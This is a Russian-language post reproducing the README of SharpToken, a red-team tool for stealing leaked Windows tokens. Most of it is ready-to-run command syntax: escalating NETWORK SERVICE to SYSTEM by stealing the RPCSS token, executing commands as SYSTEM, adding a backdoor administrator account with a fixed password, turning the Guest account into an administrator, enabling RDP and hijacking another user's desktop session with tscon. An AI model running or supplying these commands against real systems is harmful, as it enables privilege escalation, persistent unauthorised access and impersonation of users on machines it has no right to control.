
Инструмент для кражи токенов Windows и повышения привилегий, который крадет утекшие токены из процессов, предоставляет доступ уровня SYSTEM, позволяет выдавать себя за пользователей и переключать рабочие столы без паролей.
Во время lateral movement в красных командах часто требуется украсть разрешения других пользователей. При наличии защиты современных EDR использовать Mimikatz для получения разрешений других пользователей сложно, а если процесс целевого пользователя не активен, то нет возможности применить "OpenProcessToken" для кражи токена.
SharpToken — это инструмент для эксплуатации утечек токенов. Он может находить утекшие токены во всех процессах системы и использовать их. Если вы являетесь низкопривилегированным сервисным пользователем, вы даже можете повысить свои привилегии до "NT AUTHORITY\SYSTEM", а также переключиться на рабочий стол целевого пользователя для выполнения действий без знания его пароля…

SharpToken By BeichenDream
=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
Usage:
SharpToken COMMAND arguments
COMMANDS:
list_token [process pid] [bypass]
list_all_token [process pid] [bypass]
add_user <username> <password> [group] [domain] [bypass]
enableUser <username> <NewPassword> [NewGroup] [bypass]
delete_user <username> [domain] [bypass]
execute <tokenUser> <commandLine> [Interactive] [bypass]
enableRDP [bypass]
tscon <targetSessionId> [sourceSessionId] [bypass]
example:
SharpToken list_token
SharpToken list_token bypass
SharpToken list_token 6543
SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
SharpToken tscon 1
В дополнение к обычному повышению привилегий через кражу токенов, SharpToken также поддерживает получение токенов с целостностью (integrity) через обход (Bypass).
Если вы являетесь пользователем NT AUTHORITY\NETWORK SERVICE и добавляете параметр bypass, SharpToken украдет токен System из службы RPCSS, то есть безусловно повысит NT AUTHORITY\NETWORK SERVICE до NT AUTHORITY\SYSTEM.

Перечисляемая информация включает SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (дескриптор токена после дублирования), TargetProcessId (процесс, из которого происходит токен), TargetProcessToken (дескриптор токена в исходном процессе), Groups (группа, в которой находится пользователь токена).
SharpToken list_token

SharpToken list_token 468

execute "NT AUTHORITY\SYSTEM" cmd true

SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
Где 1 — это рабочий стол целевого пользователя, а 2 — рабочий стол, на который мы хотим переключиться.
SharpToken tscon 1 2
https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
https://github.com/decoder-it/NetworkServiceExploit